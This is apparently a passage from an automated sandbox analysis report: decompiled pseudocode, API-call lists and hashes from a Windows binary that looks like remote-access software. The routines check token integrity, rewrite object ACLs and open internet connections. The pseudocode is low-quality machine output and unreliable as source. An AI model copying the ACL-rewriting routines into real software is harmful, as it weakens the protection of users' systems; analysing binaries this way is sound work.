                                                                                                                        							if(_t33 != 0) {
                                                                                                                        								_v16.Value = 0;
                                                                                                                        								_v12 = 0x500;
                                                                                                                        								_v24 = 0;
                                                                                                                        								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                        									if(EqualSid( *_t56, _v24) == 0) {
                                                                                                                        										_push(_v4);
                                                                                                                        										_push( *_t56);
                                                                                                                        										L6F33C384();
                                                                                                                        									} else {
                                                                                                                        										_v20 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								FreeSid(_v24);
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t56);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v24);
                                                                                                                        					return _v16.Value;
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6F3333AA
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6F3333D1
                                                                                                                        • GetLastError.KERNEL32 ref: 6F3333DB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F3333F8
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3333FB
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6F33341D
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 6F333447
                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 6F333459
                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6F333475
                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 6F33347F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333487
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33348A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333496
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1769087308-0
                                                                                                                        • Opcode ID: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction ID: ee59c0d063054639add101dd8ae4767c52a57c19788051e63e56da3003cdff7a
                                                                                                                        • Opcode Fuzzy Hash: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction Fuzzy Hash: 7F314DB2608355AFD710DF65CC89D5BBBADEF85760F00891DF994C2140D775E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 22%
                                                                                                                        			E6F332000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                        				char _v40;
                                                                                                                        				char _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				long _v56;
                                                                                                                        				long _v60;
                                                                                                                        				long _v64;
                                                                                                                        				long _v68;
                                                                                                                        				intOrPtr _v72;
                                                                                                                        				intOrPtr _v76;
                                                                                                                        				char _v80;
                                                                                                                        				char _v92;
                                                                                                                        				intOrPtr _v96;
                                                                                                                        				intOrPtr _v108;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				long* _t34;
                                                                                                                        				signed int _t38;
                                                                                                                        				void* _t50;
                                                                                                                        				long _t52;
                                                                                                                        				intOrPtr _t55;
                                                                                                                        
                                                                                                                        				_t28 =  *_a8;
                                                                                                                        				_t52 = 0;
                                                                                                                        				_v48 = 0;
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					_t29 = _a4;
                                                                                                                        					if(_t29 == 0) {
                                                                                                                        						goto L2;
                                                                                                                        					} else {
                                                                                                                        						_t55 = _a12;
                                                                                                                        						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
                                                                                                                        						if(_t29 != 0) {
                                                                                                                        							goto L2;
                                                                                                                        						} else {
                                                                                                                        							goto L5;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t55 = _a12;
                                                                                                                        					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
                                                                                                                        					if(_t28 == 0) {
                                                                                                                        						L5:
                                                                                                                        						_v68 = 0x44;
                                                                                                                        						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
                                                                                                                        						if(_t50 != 0) {
                                                                                                                        							_t34 =  &_v68;
                                                                                                                        							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
                                                                                                                        							if(_t34 != 0) {
                                                                                                                        								_v76 = 1;
                                                                                                                        								_v80 = 0x10000000;
                                                                                                                        								_v72 = 3;
                                                                                                                        								_v64 = 0;
                                                                                                                        								_v68 = 0;
                                                                                                                        								_v52 = _t50;
                                                                                                                        								_v60 = 0;
                                                                                                                        								_v56 = 0;
                                                                                                                        								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
                                                                                                                        								_t38 =  *_v56;
                                                                                                                        								if(_t38 == 0) {
                                                                                                                        									_t38 = _v60;
                                                                                                                        									if(_t38 != 0) {
                                                                                                                        										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0); // executed
                                                                                                                        										goto L11;
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0); // executed
                                                                                                                        									L11:
                                                                                                                        									asm("sbb esi, esi");
                                                                                                                        									_t52 =  ~_t38 + 1;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t50);
                                                                                                                        						}
                                                                                                                        						return _t52;
                                                                                                                        					} else {
                                                                                                                        						L2:
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33202D
                                                                                                                        • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33205D
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 6F332074
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33207B
                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6F332094
                                                                                                                        • SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6F3320DF
                                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6F3320FB
                                                                                                                        • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6F332117
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332126
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33212D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                                        • Opcode ID: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction ID: d811240a3e099263e6a1628e8a8cff13de36a9642bc120c27838345c56475953
                                                                                                                        • Opcode Fuzzy Hash: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction Fuzzy Hash: 354108B2604399AFE710CF54CD88E6BBBBDEB85B98F40481DF641C6140D676EC488B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 64%
                                                                                                                        			E6F334760() {
                                                                                                                        				char _v8;
                                                                                                                        				char _v12;
                                                                                                                        				char _v16;
                                                                                                                        				char _v24;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				signed int _v32;
                                                                                                                        				char _v36;
                                                                                                                        				void* _v44;
                                                                                                                        				intOrPtr _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				char _v64;
                                                                                                                        				intOrPtr* _v68;
                                                                                                                        				char _v76;
                                                                                                                        				intOrPtr _v80;
                                                                                                                        				void* _v84;
                                                                                                                        				WCHAR* _v92;
                                                                                                                        				intOrPtr* _v104;
                                                                                                                        				intOrPtr* _v112;
                                                                                                                        				intOrPtr* _v120;
                                                                                                                        				intOrPtr* _v128;
                                                                                                                        				intOrPtr* _v136;
                                                                                                                        				intOrPtr* _v144;
                                                                                                                        				intOrPtr* _v148;
                                                                                                                        				intOrPtr _v152;
                                                                                                                        				intOrPtr* _v160;
                                                                                                                        				char* _t80;
                                                                                                                        				intOrPtr* _t82;
                                                                                                                        				void* _t84;
                                                                                                                        				intOrPtr* _t85;
                                                                                                                        				intOrPtr* _t88;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				void* _t97;
                                                                                                                        				char* _t98;
                                                                                                                        				intOrPtr _t99;
                                                                                                                        				intOrPtr* _t100;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				intOrPtr* _t106;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				intOrPtr* _t110;
                                                                                                                        				intOrPtr* _t112;
                                                                                                                        				void* _t114;
                                                                                                                        				intOrPtr* _t115;
                                                                                                                        				intOrPtr* _t117;
                                                                                                                        				intOrPtr* _t120;
                                                                                                                        				int _t123;
                                                                                                                        				intOrPtr* _t124;
                                                                                                                        				intOrPtr* _t126;
                                                                                                                        				WCHAR* _t128;
                                                                                                                        				intOrPtr* _t130;
                                                                                                                        				intOrPtr* _t132;
                                                                                                                        				signed int _t134;
                                                                                                                        				void* _t136;
                                                                                                                        				intOrPtr* _t138;
                                                                                                                        				intOrPtr* _t161;
                                                                                                                        				char _t185;
                                                                                                                        				void* _t186;
                                                                                                                        				void* _t187;
                                                                                                                        				char _t189;
                                                                                                                        				char _t190;
                                                                                                                        				signed int* _t191;
                                                                                                                        				void* _t192;
                                                                                                                        				WCHAR* _t194;
                                                                                                                        
                                                                                                                        				_t80 =  &_v16;
                                                                                                                        				_t185 = 0;
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v16 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33e0bc, 0, 1, 0x6f33e07c, _t80); // executed
                                                                                                                        				if(_t80 < 0) {
                                                                                                                        					L35:
                                                                                                                        					return _v32;
                                                                                                                        				}
                                                                                                                        				_t82 = _v36;
                                                                                                                        				_v24 = 0;
                                                                                                                        				_t84 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))(_t82,  &_v24, _t187, _t192); // executed
                                                                                                                        				if(_t84 < 0) {
                                                                                                                        					L10:
                                                                                                                        					_t85 = _v44;
                                                                                                                        					_v52 = _t185;
                                                                                                                        					_push( &_v52);
                                                                                                                        					_push(_t85);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
                                                                                                                        						L34:
                                                                                                                        						_t88 = _v52;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
                                                                                                                        						if(_v48 != _t185) {
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        						goto L35;
                                                                                                                        					}
                                                                                                                        					_t138 = __imp__#2;
                                                                                                                        					_t194 =  *_t138(_v28);
                                                                                                                        					if(_t194 == _t185) {
                                                                                                                        						L33:
                                                                                                                        						_t92 = _v64;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
                                                                                                                        						goto L34;
                                                                                                                        					}
                                                                                                                        					_t186 =  *_t138(_v28);
                                                                                                                        					_t189 = 0;
                                                                                                                        					if(_t186 == 0) {
                                                                                                                        						L32:
                                                                                                                        						__imp__#6(_t194);
                                                                                                                        						_t185 = 0;
                                                                                                                        						goto L33;
                                                                                                                        					}
                                                                                                                        					_t95 = _v68;
                                                                                                                        					_v64 = 0;
                                                                                                                        					_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))(_t95, _t186,  &_v64); // executed
                                                                                                                        					if(_t97 < 0) {
                                                                                                                        						L21:
                                                                                                                        						if(_v52 != _t189) {
                                                                                                                        							_t98 =  &_v84;
                                                                                                                        							_v84 = _t189;
                                                                                                                        							__imp__CoCreateInstance(0x6f33e09c, _t189, 1, 0x6f33e06c, _t98); // executed
                                                                                                                        							if(_t98 >= 0) {
                                                                                                                        								_t99 = _v60;
                                                                                                                        								if(_t99 != 0) {
                                                                                                                        									_t189 =  *_t138(_t99);
                                                                                                                        								}
                                                                                                                        								_t100 = _v104;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194); // executed
                                                                                                                        								_t102 = _v112;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
                                                                                                                        								if(_t189 != 0) {
                                                                                                                        									_t117 = _v120;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
                                                                                                                        								}
                                                                                                                        								_t104 = _v120;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
                                                                                                                        								_t106 = _v128;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
                                                                                                                        								_t108 = _v136;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
                                                                                                                        								_t110 = _v144;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
                                                                                                                        								_t112 = _v148;
                                                                                                                        								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))(_t112, _v152); // executed
                                                                                                                        								if(_t114 >= 0) {
                                                                                                                        									_v144 = 1;
                                                                                                                        								}
                                                                                                                        								_t115 = _v160;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
                                                                                                                        								if(_t189 != 0) {
                                                                                                                        									__imp__#6(_t189);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L31:
                                                                                                                        						__imp__#6(_t186);
                                                                                                                        						goto L32;
                                                                                                                        					}
                                                                                                                        					_t120 = _v76;
                                                                                                                        					_v84 = 0;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
                                                                                                                        					_t123 = lstrcmpiW(_t194, _v92);
                                                                                                                        					_t190 = _v44;
                                                                                                                        					if(_t123 == 0) {
                                                                                                                        						if(_t190 == 0) {
                                                                                                                        							_t130 = _v84;
                                                                                                                        							_v76 = _t190;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
                                                                                                                        							if(_v84 == _t190) {
                                                                                                                        								_t132 = _v92;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_v76 = 1;
                                                                                                                        					}
                                                                                                                        					_t124 = _v84;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
                                                                                                                        					if(_v80 != 0) {
                                                                                                                        						if(_t190 != 0) {
                                                                                                                        							_t126 = _v92;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
                                                                                                                        						}
                                                                                                                        						goto L31;
                                                                                                                        					} else {
                                                                                                                        						_t128 = _v92;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
                                                                                                                        						_t189 = 0;
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t191 = 0x6f33d820;
                                                                                                                        					do {
                                                                                                                        						_t134 =  *_t191;
                                                                                                                        						if((_v32 & _t134) == 0) {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						_t161 = _v44;
                                                                                                                        						_v36 = _t185;
                                                                                                                        						_t136 =  *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))(_t161, _t134,  &_v36); // executed
                                                                                                                        						if(_t136 < 0 || _v48 != _t185) {
                                                                                                                        							_v48 = _t185;
                                                                                                                        							goto L10;
                                                                                                                        						} else {
                                                                                                                        							_v48 = 1;
                                                                                                                        						}
                                                                                                                        						L7:
                                                                                                                        						_t191 =  &(_t191[1]);
                                                                                                                        					} while (_t191 < "\"%s\" f");
                                                                                                                        					goto L10;
                                                                                                                        				}
                                                                                                                        			}
                                                                                                                        0x6f3348e1
                                                                                                                        0x6f3348e3
                                                                                                                        0x00000000
                                                                                                                        0x6f3348e3
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347bd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3347bf
                                                                                                                        0x6f3347c8
                                                                                                                        0x6f3347d3
                                                                                                                        0x6f3347d7
                                                                                                                        0x6f3347f1
                                                                                                                        0x00000000
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e7
                                                                                                                        0x00000000
                                                                                                                        0x6f3347b7

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0BC,00000000,00000001,6F33E07C,?,?,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334789
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33481D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33482E
                                                                                                                        • lstrcmpiW.KERNEL32(00000000,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334875
                                                                                                                        • CoCreateInstance.OLE32(6F33E09C,00000000,00000001,6F33E06C,?,?,6F334C88,?,?,?,?,00000001), ref: 6F334905
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33491C
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C0
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C7
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                                        • String ID: "%s" f
                                                                                                                        • API String ID: 1501015606-2173819097
                                                                                                                        • Opcode ID: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction ID: c32771a2695a69ceee25197c93ab087ed40e667b8df5f0d45bdcb0e6e172035b
                                                                                                                        • Opcode Fuzzy Hash: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction Fuzzy Hash: A9911576A047529FC200DF69C880D5BB7E9BFC9704F104A4DF5958B264DB32E846CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C23DB
                                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                                          • Part of subcall function 004B597B: __EH_prolog3_GS.LIBCMT ref: 004B5982
                                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$QueryValue$H_prolog3_H_prolog3_catch__wmemset
                                                                                                                        • String ID: Init: Load Registry Proxy Settings failed (.\Global.cpp, 685)$ProxyPassword$ProxyPasswordAES$ProxyPasswordSecure$ProxyUsername$Proxy_Exceptions$Proxy_IP$Proxy_IPIE$Proxy_Type
                                                                                                                        • API String ID: 2336546291-1449184549
                                                                                                                        • Opcode ID: d40650014a79fc69b7d69a2adb29391599e5dd7d2ea6d6a2ed6fbe4427310674
                                                                                                                        • Instruction ID: 4eb981286a0cb3f2b9a51b73bebf72b59e17a6e9c12f6f4a10bf5902cb55b58d
                                                                                                                        • Opcode Fuzzy Hash: d40650014a79fc69b7d69a2adb29391599e5dd7d2ea6d6a2ed6fbe4427310674
                                                                                                                        • Instruction Fuzzy Hash: 12715C71D40244EADB14FFA9CA56BDD7B75AF11708F10406EE001672E2DBB85F08D79A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TranslateMessage.USER32(?), ref: 0059F418
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0059F423
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059F431
                                                                                                                        Strings
                                                                                                                        • EventSink.ListenForEvents: Unadvise failed with error %1% (facility %2%) (.\EventSink.cpp, 165), xrefs: 0059F45D
                                                                                                                        • EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 188), xrefs: 0059F616
                                                                                                                        • EventSink.ListenForEvents: FindConnectionPoint failed with error %1% (facility %2%) (.\EventSink.cpp, 182), xrefs: 0059F596
                                                                                                                        • EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 176), xrefs: 0059F51D
                                                                                                                        • EventSink.ListenForEvents: Advise failed with error %1% (facility %2%) (.\EventSink.cpp, 170), xrefs: 0059F4C8
                                                                                                                        • EventSink.ListenForEvents: CoCreateInstance failed with error %1% (facility %2%) (.\EventSink.cpp, 195), xrefs: 0059F699
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchTranslate
                                                                                                                        • String ID: EventSink.ListenForEvents: Advise failed with error %1% (facility %2%) (.\EventSink.cpp, 170)$EventSink.ListenForEvents: CoCreateInstance failed with error %1% (facility %2%) (.\EventSink.cpp, 195)$EventSink.ListenForEvents: FindConnectionPoint failed with error %1% (facility %2%) (.\EventSink.cpp, 182)$EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 176)$EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%) (.\EventSink.cpp, 188)$EventSink.ListenForEvents: Unadvise failed with error %1% (facility %2%) (.\EventSink.cpp, 165)
                                                                                                                        • API String ID: 1706434739-2046564585
                                                                                                                        • Opcode ID: 43cbab10ef7d4a64d7151b4f4e5a7e5f6c6bdd1ccb4c6e7771aebeaa2555279a
                                                                                                                        • Instruction ID: b662efda282acd704f288cc07c344a66b61c2c4ea224bf35853cd6634b79e8e2
                                                                                                                        • Opcode Fuzzy Hash: 43cbab10ef7d4a64d7151b4f4e5a7e5f6c6bdd1ccb4c6e7771aebeaa2555279a
                                                                                                                        • Instruction Fuzzy Hash: 23B173B15083819FD720DF64C849B9EBBE9AF98314F140E2DF589C7282EB78D548C726
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C08F4
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004C0973
                                                                                                                        • InternetOpenW.WININET(-00000004), ref: 004C09BE
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000049,?,00000004), ref: 004C09F2
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000004A,00000014,00000004), ref: 004C09FD
                                                                                                                        • InternetSetOptionW.WININET(?,00000002,?,00000004), ref: 004C0A1A
                                                                                                                        • InternetSetOptionW.WININET(?,00000005,00002328,00000004), ref: 004C0A29
                                                                                                                        • InternetSetOptionW.WININET(?,00000006,0001D4C0,00000004), ref: 004C0A38
                                                                                                                        Strings
                                                                                                                        • Mozilla/4.0 (compatible; MSIE 6.0; DynGate), xrefs: 004C098B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Option$H_prolog3$CloseHandleOpen
                                                                                                                        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                        • API String ID: 1037293847-385611765
                                                                                                                        • Opcode ID: 90e27d75eda2ba1f953f2dce45877ea9079048077649ac18ec512aaa74110282
                                                                                                                        • Instruction ID: a9245877e6b401a6c61c8af2d1480b8a469057b773e8c57abfe80e1662820dad
                                                                                                                        • Opcode Fuzzy Hash: 90e27d75eda2ba1f953f2dce45877ea9079048077649ac18ec512aaa74110282
                                                                                                                        • Instruction Fuzzy Hash: 0A41D1B6900706EBEB60EBA4CC46FFFB7B8EB44710F10452EE251A6291D7785A41CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E6F333280(void* _a4) {
                                                                                                                        				void _v0;
                                                                                                                        				void* _v16;
                                                                                                                        				void _v72;
                                                                                                                        				long _v76;
                                                                                                                        				long _v80;
                                                                                                                        				long _v84;
                                                                                                                        				void* _v88;
                                                                                                                        				char _v96;
                                                                                                                        				DWORD* _t32;
                                                                                                                        				int _t36;
                                                                                                                        				long _t52;
                                                                                                                        
                                                                                                                        				_t52 = _a4;
                                                                                                                        				_v76 = 0;
                                                                                                                        				_v84 = _t52;
                                                                                                                        				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
                                                                                                                        					_a4 = 0;
                                                                                                                        					_v80 = 0;
                                                                                                                        					if( *0x6f34027c <= 5) {
                                                                                                                        						L7:
                                                                                                                        						DuplicateToken(_v84, 1,  &_a4);
                                                                                                                        						if(_v0 != 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
                                                                                                                        						if(_t36 != 0 && _v76 == 3) {
                                                                                                                        							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
                                                                                                                        						}
                                                                                                                        						if(_v0 != 0) {
                                                                                                                        							L8:
                                                                                                                        							_t32 =  &_v84;
                                                                                                                        							_v84 = 0x44;
                                                                                                                        							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
                                                                                                                        							if(_t32 != 0) {
                                                                                                                        								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
                                                                                                                        							}
                                                                                                                        							FindCloseChangeNotification(_v16); // executed
                                                                                                                        						} else {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_t52 == 0) {
                                                                                                                        						CloseHandle(_v88);
                                                                                                                        					}
                                                                                                                        					return _v80;
                                                                                                                        				} else {
                                                                                                                        					return _v76;
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        APIs
